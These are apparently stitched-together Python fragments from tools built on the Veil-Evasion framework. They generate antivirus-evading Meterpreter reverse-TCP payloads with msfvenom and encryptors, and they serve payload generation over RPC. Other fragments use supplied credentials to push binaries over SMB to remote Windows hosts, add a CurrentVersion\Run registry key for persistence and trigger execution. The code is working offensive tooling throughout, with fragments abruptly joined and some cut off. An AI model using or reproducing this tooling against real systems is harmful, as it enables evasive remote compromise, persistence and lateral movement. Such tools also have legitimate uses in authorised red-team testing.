def generate(self, name, payload, language='python'):
''' Gerenate shell with args '''
controller = veil_controller.Controller()
options = {}
options['msfvenom'] = [payload.msfpayload, payload.msfoptions]
options['required_options'] = {
'compile_to_exe': 'Y',
'use_pyherion': 'Y'
}
controller.SetPayload(language, payload.cryptor, options)
file_name = name + "_veil"
file_path = controller.OutputMenu(
controller.payload,
controller.GeneratePayload(),
showTitle=False,
interactive=False,
OutputBaseChoice=file_name,
)
payload.file_path = file_path
dbsession.add(payload)
dbsession.flush()
def __generate__(self,
msfpayload,
msfoptions,
cryptor,
name,
language='python'):
''' Gerenate shell with args '''
logging.debug("msfpayload: %s" % msfpayload)
logging.debug("msfoptions: %s" % msfoptions)
logging.debug("cryptor: %s" % cryptor)
controller = veil_controller.Controller()
options = {}
options['msfvenom'] = [msfpayload, msfoptions]
controller.SetPayload(language, cryptor, options)
file_name = name + "_veil"
file_path = controller.OutputMenu(
controller.payload,
controller.GeneratePayload(),
showTitle=False,
interactive=False,
OutputBaseChoice=file_name,
)
return file_path
def generate_payloads(numPayloads, handlerAddr, handlerPort):
baseName = "veil-payload-"
timestamp = int(time.time())
lhost = "LHOST=" + str(handlerAddr)
lport = "LPORT=" + str(handlerPort)
# Generate revse_tcp payload for veil external exe/py encryptors
print("Generating test executable...")
exeName = "/user/share/veil-evasion/testbins/payload.exe"
pyName = "/user/share/veil-evasion/testbins/payload.py"
os.system(
"msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp %s %s -e x86/shikata_ga_nai -f exe -o /usr/share/veil-evasion/testbins/payload.exe"
% (lhost, lport))
os.system(
'msfvenom -p python/meterpreter_reverse_tcp -o /usr/share/veil-evasion/testbins/payload.py'
)
print("Generating %d payloads..." % numPayloads)
# Instantiate main controller
list_controller = controller.Controller(oneRun=True)
# Load payloads from veil
for (name, payload) in list_controller.payloads:
# Payloads that need fixing to work...
toDo = [
"auxiliary/macro_converter", "native/hyperion",
"native/pe_scrambler",
"powershell/shellcode_inject/download_virtual",
"perl/shellcode_inject/flat",
"powershell/shellcode_inject/download_virtual_https"
]
if name not in toDo:
print("Generating payloads for %s..." % name)
# Initialize options
options = {}
options['required_options'] = {}
# Check for required options
if hasattr(payload, 'required_options'):
for key in sorted(payload.required_options.iterkeys()):
if key == 'LHOST':
options['required_options']['LHOST'] = [
str(handlerAddr), ''
]
elif key == 'LPORT':
options['required_options']['LPORT'] = [
str(handlerPort), ''
]
elif key == 'DOWNLOAD_HOST':
options['required_options']['DOWNLOAD_HOST'] = [
str(handlerAddr), ''
]
elif key == 'ORIGINAL_EXE':
if name != 'native/backdoor_factory':
options['required_options'][
'ORIGINAL_EXE'] = exeName
elif key == 'PYTHON_SOURCE':
options['required_options']['PYTHON_SOURCE'] = pyName
# Check payload for shellcode attribute
if hasattr(payload, 'shellcode'):
options['msfvenom'] = [
"windows/meterpreter/reverse_tcp", [lhost, lport]
]
class Args(object):
pass
args = Args()
args.pwnstaller = True
args.overwrite = True
# Generate number of requested payloads
for x in range(numPayloads):
args.o = name.replace("/", "_") + "-" + str(x)
sample_controller = controller.Controller(oneRun=True)
sample_controller.SetPayload(name, options)
code = sample_controller.GeneratePayload()
print(args.o)
outName = sample_controller.OutputMenu(
sample_controller.payload,
code,
showTitle=False,
interactive=False,
args=args)
else:
# Payload in To-Do list
print("Skipping: %s" % name)
parser.add_argument('--version',
action="store_true",
help='Displays version and quits.')
args = parser.parse_args()
# Print version
if args.version:
messages.title()
sys.exit()
# Print main title
messages.title()
# instantiate the main controller object
controller = controller.Controller(oneRun=False)
# call the update functionality for Veil and then exit
if args.update:
controller.UpdateVeil(interactive=False)
sys.exit()
# use interactive menu if not arguments
controller.MainMenu(args=args)
# Catch ctrl + c interrupts from the user
except KeyboardInterrupt:
print helpers.color("\n\n [!] Exiting...\n", warning=True)
except EOFError:
print helpers.color("\n\n [!] Exiting...\n", warning=True)
help='Metasploit payload to generate.')
parser.add_argument(
'--msfoptions',
metavar="OPTION=value",
nargs='*',
help='Options for the specified metasploit payload.')
parser.add_argument('--custshell',
metavar="\\x00...",
help='Custom shellcode string to use.')
args = parser.parse_args()
# Print main title
messages.title()
# instantiate the main controller object
controller = controller.Controller()
# use interactive menu if a language isn't specified
if not args.l:
controller.MainMenu()
sys.exit()
# list languages available if "-l" is present but no language specified
elif args.l == "list":
controller.ListLangs()
sys.exit()
# if a language is specified but a payload isn't, list available
# payload for that language
elif args.p == "list" or not args.p:
controller.ListPayloads(args.l)
def dispatch_request(self, subject):
print "dispatch_request(%s)" % (repr(subject), )
try:
# extract the method name and associated parameters
method = subject['method']
params = subject['params']
# instantiate a main Veil-Evasion controller
con = controller.Controller(oneRun=False)
# handle a request for version
if method == "version":
return messages.version
# handle a request to list all payloads
elif method == "payloads":
payloads = []
# return a list of all available payloads, no params needed
for (name, payload) in con.payloads:
payloads.append(name)
return payloads
# handle a request to list a particular payload's options
elif method == "payload_options":
# returns options available for a particular payload
options = []
if len(params) > 0:
# nab the payload name
payloadname = params[0]
# find this payload from what's available
for (name, payload) in con.payloads:
if payloadname.lower() == name.lower():
p = payload
# see what required options are available
if hasattr(p, 'required_options'):
for key in sorted(
p.required_options.
iterkeys()):
# return for the option - name,default_value,description
options.append((
key,
p.required_options[key][0],
p.required_options[key][1]
))
# check if this is a shellcode-utilizing payload
if hasattr(p, 'shellcode'):
options.append("shellcode")
return options
# handle a request to generate a payload
elif method == "generate":
if len(params) > 0:
payloadName, outputbase = "", ""
overwrite = False
payload = None
options = {}
options['required_options'] = {}
# pull these metaoptions out first
try:
for param in params:
if param.startswith("payload="):
t, payloadName = param.split("=")
elif param.startswith("outputbase="):
t, outputbase = param.split("=")
elif param.startswith("overwrite="):
t, choice = param.split("=")
if choice.lower() == "true":
overwrite = True
except:
return ""
# find our payload in the controller object list
for (name, p) in con.payloads:
if payloadName.lower() == name.lower():
payload = p
# error checking
if not payload: return ""
# parse all the parameters
for param in params:
# don't include these metaoptions
if param.startswith(
"payload=") or param.startswith(
"outputbase="
) or param.startswith(
"overwrite="):
continue
# extract the name/value from this parameter
name, value = param.split("=")
required_options = []
# extract the required options if they're there
if hasattr(payload, 'required_options'):
required_options = payload.required_options.iterkeys(
)
# if the value we're passed is in the required options
if name in required_options:
options['required_options'][name] = [
value, ""
]
elif name == "shellcode":
options['customShellcode'] = value
elif name == "msfpayload" or name == "msfvenom":
options['msfvenom'] = [value, []]
# assume we have msfvenom options otherwise
else:
# temporarily get the msfoptions out
t = options['msfvenom']
if not t[1]:
# if there are no existing options
options['msfvenom'] = [
t[0],
[str((name + "=" + value))]
]
else:
# if there are, append
options['msfvenom'] = [
t[0], t[1] +
[str((name + "=" + value))]
]
# manually set the payload in the controller object
con.SetPayload(payloadName, options)
# generate the payload code
code = con.GeneratePayload()
class Args(object):
pass
args = Args()
args.overwrite = overwrite
args.o = outputbase
# write out the payload code to the proper output file
outName = con.OutputMenu(con.payload,
code,
showTitle=False,
interactive=False,
args=args)
# return the written filename
return outName
else:
return ""
else:
return ""
except:
return ""
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
uploadName = self.required_options["upload_name"][0]
key_name = self.required_options["key_name"][0]
# if we're using Veil-Evasion for payload generation
if self.required_options["exe_path"][0].lower() == "veil":
# create a Veil-Evasion controller object for payload generation
con = controller.Controller()
# if we don't have payload specified, jump to the main controller menu
if not self.args.p:
payloadPath = con.MainMenu()
# otherwise, set all the appropriate payload options
else:
# pull out any required options from the command line and
# build the proper dictionary so we can set the payload manually
options = {}
if self.args.c:
options['required_options'] = {}
for option in self.args.c:
name, value = option.split("=")
options['required_options'][name] = [value, ""]
# pull out any msfvenom shellcode specification and msfvenom options
if self.args.msfpayload:
options['msfvenom'] = [
self.args.msfpayload, self.args.msfoptions
]
# manually set the payload in the controller object
con.SetPayload(self.args.p, options)
# generate the payload code
code = con.GeneratePayload()
# grab the generated payload .exe name
payloadPath = con.OutputMenu(con.payload,
code,
showTitle=True,
interactive=False)
# nicely print the title and module name again (since Veil-Evasion trashes this)
messages.title()
print " [*] Executing module: " + helpers.color(self.name) + "..."
# sanity check if the user exited Veil-Evasion execution
if not payloadPath or payloadPath == "":
print helpers.color(" [!] No output from Veil-Evasion",
warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# if we have a custom-specified .exe, use that instead
else:
payloadPath = self.required_options["exe_path"][0]
# if the .exe path doesn't exist, print and error and return
if not os.path.exists(payloadPath):
print helpers.color("\n\n [!] Invalid .exe path specified",
warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# make sure the name ends with ".exe"
if not uploadName.endswith(".exe"):
uploadName += ".exe"
# copy the resulting binary into the temporary directory with the appropriate name
os.system("cp " + payloadPath + " /tmp/" + uploadName)
for target in self.targets:
baseName = payloadPath.split("/")[-1]
# upload the payload to C:\Windows\System32\
smb.uploadFile(target, username, password, "C$", "\\Windows\\",
"/tmp/" + uploadName)
self.output += "[*] Binary '" + baseName + "' uploaded to C:\\Windows\\" + uploadName + " using creds '" + username + ":" + password + "' on : " + target + "\n"
# the registry command to set up the sethc stickkeys backdoor for the binary
regCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /f /v " + key_name + " /t REG_SZ /d \"C:\\Windows\\" + uploadName + "\""
# execute the sethc command and get the result
sethcResult = command_methods.executeResult(
target, username, password, regCommand, triggerMethod)
if sethcResult == "":
self.output += "[!] No result file, CurrentVersion\\Run registry command failed using creds '" + username + ":" + password + "' on : " + target + "\n"
elif "The operation completed successfully" in sethcResult:
self.output += "[*] CurrentVersion\\Run successfully set using creds '" + username + ":" + password + "' on : " + target + "\n"
# build our cleanup -> deleting this registry run value
cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v " + key_name + " /f"
self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
transport = self.required_options["transport"][0]
exe_path = self.required_options["exe_path"][0]
lhost = self.required_options["lhost"][0]
spawnHandler = self.required_options["spawn_handler"][0].lower()
# quick sanity check for host/execute logic before we continue...
if transport.lower() == "host":
# if 'host' is given for a transport method but no lhost is specified
if lhost == "none" or lhost == "":
print helpers.color("\n [!] lhost needed when hosting a payload", warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# if we're using Veil-Evasion for payload generation
if exe_path.lower() == "veil":
# create a Veil-Evasion controller object for payload generation
con = controller.Controller()
# check various possibly flags passed by the command line
# if we don't have payload specified, jump to the main controller menu
if not self.args.p:
payloadPath = con.MainMenu()
# otherwise, set all the appropriate payload options
else:
# pull out any required options from the command line and
# build the proper dictionary so we can set the payload manually
options = {}
if self.args.c:
options['required_options'] = {}
for option in self.args.c:
name,value = option.split("=")
options['required_options'][name] = [value, ""]
# pull out any msfvenom shellcode specification and msfvenom options
if self.args.msfpayload:
options['msfvenom'] = [self.args.msfpayload, self.args.msfoptions]
# manually set the payload in the controller object
con.SetPayload(self.args.p, options)
# generate the payload code
code = con.GeneratePayload()
# grab the generated payload .exe name
payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False)
# nicely print the title and module name again (since Veil-Evasion trashes this)
messages.title()
print " [*] Executing module: " + helpers.color(self.name) + "..."
# sanity check if the user exited Veil-Evasion execution
if not payloadPath or payloadPath == "":
print helpers.color(" [!] No output from Veil-Evasion", warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# if we have a custom-specified .exe, use that instead
else:
payloadPath = exe_path
# if the .exe path doesn't exist, print and error and return
if not os.path.exists(payloadPath):
print helpers.color("\n\n [!] Invalid .exe path specified", warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
# if we're using Veil-Evasion's generated handler script, try to spawn it
if spawnHandler.lower() == "true":
# build the path to what the handler should be and
handlerPath = settings.HANDLER_PATH + payloadPath.split(".")[0].split("/")[-1] + "_handler.rc"
# command to spawn a new tab
cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
# invoke msfconsole with the handler script in a new tab
os.system(cmd)
raw_input("\n [>] Press enter when handler is ready: ")
# the hostTrigger method gets the whole target list so the smb hosting
# server doesn't have to be setup/torn down for each target
if transport.lower() == "host":
# if 'host' is given for a transport method but no lhost is specified
if lhost == "none":
print helpers.color("\n [!] lhost needed when hosting a payload", warning=True)
raw_input("\n [>] Press enter to continue: ")
return ""
else:
# execute the host/trigger command with all the targers
process = delivery_methods.hostTrigger(self.targets, username, password, payloadPath, lhost, triggerMethod)
# build the command to kill that process
killCmd = "taskkill /f /im "+process
for target in self.targets:
self.output += "[*] Payload '\\\\"+lhost+"\\SYSTEM\\"+process+"' triggered using creds '"+username+":"+password+"' on : " + target + "\n"
# build our cleanup file to kill the process
self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCmd+"|"+triggerMethod+"\n"
# assume upload/trigger
else:
for target in self.targets:
# execute the upload/trigger command with all the targets
deliveredName = delivery_methods.uploadTrigger(target, username, password, payloadPath, triggerMethod)
self.output += "[*] Payload '"+deliveredName+"' uploaded and triggered using creds '"+username+":"+password+"' on : " + target + "\n"
# build the command to kill that process
killCmd = "taskkill /f /im "+deliveredName
# build our cleanup file to kill the process and delete the binary
self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCmd+"|"+triggerMethod+"\n"
# sleep for 3 seconds
self.cleanup += "sleep|1\n"
# delete the file off
self.cleanup += "deletefile|"+target+"|"+username+"|"+password+"|C:\\Windows\\Temp\\"+deliveredName+"\n"
def BuildVeilTCP(LHOST,
LPORT,
outputbasename,
lang,
pwnstaller=True,
overwrite=True,
**kwargs): # IMPLEMENT
'''
kwargs:
'''
# Instantiate the controller
controller = VeilController.Controller(oneRun=True)
# Build the options dictionaries.
options = {}
options['required_options'] = {}
# Set the options per language.
if str.lower(lang) == 'python':
print "Using python"
options['required_options']['ARCHITECTURE'] = ['32', ""]
options['required_options']['COMPILE_TO_EXE'] = ['Y', ""]
options['required_options']['EXPIRE_PAYLOAD'] = ['X', ""]
options['required_options']['LHOST'] = [LHOST, ""]
options['required_options']['LPORT'] = [LPORT, ""]
options['required_options']['USE_PYHERION'] = ['Y', ""]
args = Namespace(o=outputbasename + "p",
pwnstaller=pwnstaller,
overwrite=overwrite)
controller.SetPayload('python/meterpreter/rev_tcp', options)
elif str.lower(lang) == 'ruby':
print "Using Ruby"
options['required_options']['LHOST'] = [LHOST, ""]
options['required_options']['LPORT'] = [LPORT, ""]
args = Namespace(o=outputbasename + "r",
pwnstaller=False,
overwrite=overwrite)
controller.SetPayload('ruby/meterpreter/rev_tcp', options)
elif str.lower(lang) == 'powershell':
# Add logic.
print "Using powershell"
options['required_options']['LHOST'] = [LHOST, ""]
options['required_options']['LPORT'] = [LPORT, ""]
args = Namespace(o=outputbasename + "p",
pwnstaller=False,
overwrite=overwrite)
controller.SetPayload('powershell/meterpreter/rev_tcp', options)
# Continue to add more languages here.
else:
print "BuildVeilTCP: Error - Invalid lang setting."
# Generate the payload
payloadcode = controller.GeneratePayload()
# Gotta change into the Veil-Evasion directory. Save current working dir, change, then change back.
workingdirectory = os.getcwd()
os.chdir(VeilSettings.VEIL_EVASION_PATH)
outFile = controller.OutputMenu(controller.payload,
payloadcode,
showTitle=False,
interactive=False,
args=args)
# Changing back
os.chdir(workingdirectory)
if str.lower(lang) == 'powershell':
f = open(outFile, 'r')
fr = f.read()
f.close()
print fr + "\n"
return fr # outFile
return outFile
